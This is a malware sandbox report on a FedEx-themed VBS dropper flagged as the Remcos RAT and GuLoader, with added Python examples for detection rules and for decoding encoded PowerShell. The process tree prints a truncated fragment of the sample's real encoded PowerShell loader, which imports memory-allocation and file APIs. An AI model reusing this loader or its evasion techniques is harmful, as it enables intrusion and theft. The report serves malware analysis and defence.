Windows Analysis Report
775578748333_FEDEX.vbs
Overview
General Information
Detection
Remcos GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Creates an autostart registry key pointing to binary in C:\Windows
Potential evasive VBS script found (sleep loop)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
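The process-creation behaviours in the list above (a script host starting PowerShell directly or via cmd, an encoded PowerShell command line, a very long command line, and csc.exe compiling from a user-writable folder, which is what the "Suspicious Csc.exe Source File Folder" Sigma rule looks for) can be checked against endpoint telemetry. The following is an added example, not part of the report and not Joe Sandbox or Sigma code: it triages Sysmon-style events with a hand-rolled rule set. The events are constructed, the 1000-character threshold for "very long" is an assumption (the report gives no number), the list of `-EncodedCommand` abbreviations is the common ones rather than every prefix PowerShell accepts, and the user-writable path list is a small approximation of the Sigma rule's.

```python
"""Rule-based triage of process-creation events for the behaviours the
sandbox report flags. Added example; constructed events, assumed thresholds."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str
    cmdline: str
    parent_image: str
    grandparent_image: str = ""   # needed for the wscript -> cmd -> powershell chain


LONG_CMDLINE = 1000               # assumed threshold; the report only says "very long"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Common abbreviations of -EncodedCommand followed by a base64 blob (quoted or not).
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+\"?([A-Za-z0-9+/=]{20,})", re.I)
# Approximation of the Sigma rule's user-writable source folders (assumption).
USER_WRITABLE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Users\\Public)\\", re.I)


def base_name(path: str) -> str:
    """Lower-case file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> list[str]:
    """Return the list of rule names the event matches (empty if benign)."""
    hits = []
    img, parent, gparent = base_name(ev.image), base_name(ev.parent_image), base_name(ev.grandparent_image)
    if img in ("powershell.exe", "pwsh.exe"):
        # "Wscript starts Powershell (via cmd or directly)"
        if parent in SCRIPT_HOSTS or (parent == "cmd.exe" and gparent in SCRIPT_HOSTS):
            hits.append("script host starts PowerShell")
        # "Encrypted powershell cmdline option found" / Sigma "Powershell with Base64"
        if ENC_FLAG.search(ev.cmdline):
            hits.append("encoded PowerShell command line")
    # "Very long command line found"
    if len(ev.cmdline) > LONG_CMDLINE:
        hits.append(f"command line longer than {LONG_CMDLINE} chars")
    # Sigma "Suspicious Csc.exe Source File Folder": Add-Type hands csc.exe a
    # .cmdline response file under the user's temp folder
    if img == "csc.exe" and USER_WRITABLE.search(ev.cmdline):
        hits.append("csc.exe compiling from a user-writable folder")
    return hits


def enc_cmd(script: str) -> str:
    """Build what PowerShell expects after -EncodedCommand (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events (not from the report); the paths mirror the report's layout.
PS64 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = {
    "wscript_to_powershell": ProcEvent(
        image=PS64,
        cmdline='"' + PS64 + '" -EncodedCommand "' + enc_cmd("Write-Host x;" * 80) + '"',
        parent_image=r"C:\Windows\System32\wscript.exe"),
    "cmd_chain": ProcEvent(
        image=PS,
        cmdline="powershell.exe -enc " + enc_cmd("Start-Sleep 200"),
        parent_image=r"C:\Windows\System32\cmd.exe",
        grandparent_image=r"C:\Windows\System32\wscript.exe"),
    "csc_from_temp": ProcEvent(
        image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
        cmdline=r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
                r'@"C:\Users\user\AppData\Local\Temp\abcd\abcd.cmdline"',
        parent_image=PS64),
    "benign_powershell": ProcEvent(
        image=PS,
        cmdline='"' + PS + '" -NoProfile -Command Get-Date',
        parent_image=r"C:\Windows\explorer.exe"),
}


if __name__ == "__main__":
    for name, ev in EVENTS.items():
        print(f"{name}: {triage(ev) or 'no hits'}")
```

The parent/grandparent lookup is what distinguishes the "via cmd" variant from a direct launch; a rule keyed only on the immediate parent misses the cmd.exe hop.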
Classification
- System is w10x64
- wscript.exe (PID: 7076, cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\775578748333_FEDEX.vbs", MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  - powershell.exe (PID: 5616, cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbg (base64 of a UTF-16LE PowerShell script; the report truncates it here)
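The `-EncodedCommand` argument is base64 over the UTF-16LE bytes of the script. Decoding the prefix that survives in the report shows a junk comment line followed by `Add-Type -TypeDefinition` and `DllImport` declarations for `NtAllocateVirtualMemory` (ntdll.dll), `CreateFileA` and `ReadFile` (kernel32.dll), with a user32.dll import cut off by the truncation; `Add-Type` compiling that C# through csc.exe is what produces the "Compiles C# or VB.Net code" and "Suspicious Csc.exe Source File Folder" hits above. The following decoder is an added example, not part of the report or of Joe Sandbox: it strips the whitespace that report extraction inserts every ten characters, tolerates a truncated tail, and pulls the library/function pairs out of the `DllImport` attributes. The embedded script is a constructed stand-in that reuses only the three API names visible on the page; the parameter names and class name are placeholders.

```python
"""Decode a PowerShell -EncodedCommand blob (possibly truncated or
whitespace-split by extraction) and list the P/Invoke imports it declares.
Added example; the embedded script is constructed, not the sample's payload."""
import base64
import re

# Constructed stand-in for the sample's Add-Type stub (API names from the
# report, everything else a placeholder).
SAMPLE_SCRIPT = (
    "# constructed junk comment\r\n"
    'Add-Type -TypeDefinition @"\r\n'
    "using System;\r\n"
    "using System.Runtime.InteropServices;\r\n"
    "public static class Loader\r\n"
    "{\r\n"
    '[DllImport("ntdll.dll")]public static extern int '
    "NtAllocateVirtualMemory(int a,ref Int32 b,int c,ref Int32 d,int e,int f);\r\n"
    '[DllImport("kernel32.dll")]public static extern IntPtr '
    "CreateFileA(string a,uint b,int c,int d,int e,int f,int g);\r\n"
    '[DllImport("kernel32.dll")]public static extern int '
    "ReadFile(int a,uint b,IntPtr c,ref Int32 d,int e);\r\n"
    "}\r\n"
    '"@\r\n'
)

# [DllImport("lib")] ... <return type> <FunctionName>(  -- lazy so the first
# identifier directly followed by "(" after the attribute is the function name.
DLLIMPORT_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"\)\][^;]*?\b(?P<func>\w+)\s*\(', re.I)


def encode_command(script: str) -> str:
    """Produce the string PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse encode_command. Whitespace anywhere in the blob is discarded
    (report extraction inserts a space every ten characters); an incomplete
    final base64 quartet and a dangling half UTF-16 code unit are dropped so a
    truncated blob still decodes as far as it goes."""
    b64 = re.sub(r"\s+", "", blob)
    b64 = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le", errors="replace")


def extract_pinvokes(script: str) -> list[tuple[str, str]]:
    """(dll, function) pairs declared via [DllImport], in order of appearance."""
    return [(m.group("dll").lower(), m.group("func")) for m in DLLIMPORT_RE.finditer(script)]


def triage(blob: str) -> dict:
    """Decode a blob and summarise what an analyst wants first: whether it
    compiles code with Add-Type and which native APIs it binds."""
    script = decode_command(blob)
    return {
        "decoded_length": len(script),
        "add_type": "Add-Type" in script,
        "pinvokes": extract_pinvokes(script),
    }


if __name__ == "__main__":
    enc = encode_command(SAMPLE_SCRIPT)
    # Re-create the extraction damage: a space after every ten characters.
    spaced = " ".join(enc[i:i + 10] for i in range(0, len(enc), 10))
    print(triage(spaced))
    print(triage(spaced[:800]))   # truncated, like the report's copy
```

To run this over the report's own command line, paste the whole quoted `-EncodedCommand` value (spaces included) into `triage`; the quartet and code-unit trimming is what keeps the truncated copy from raising a padding error.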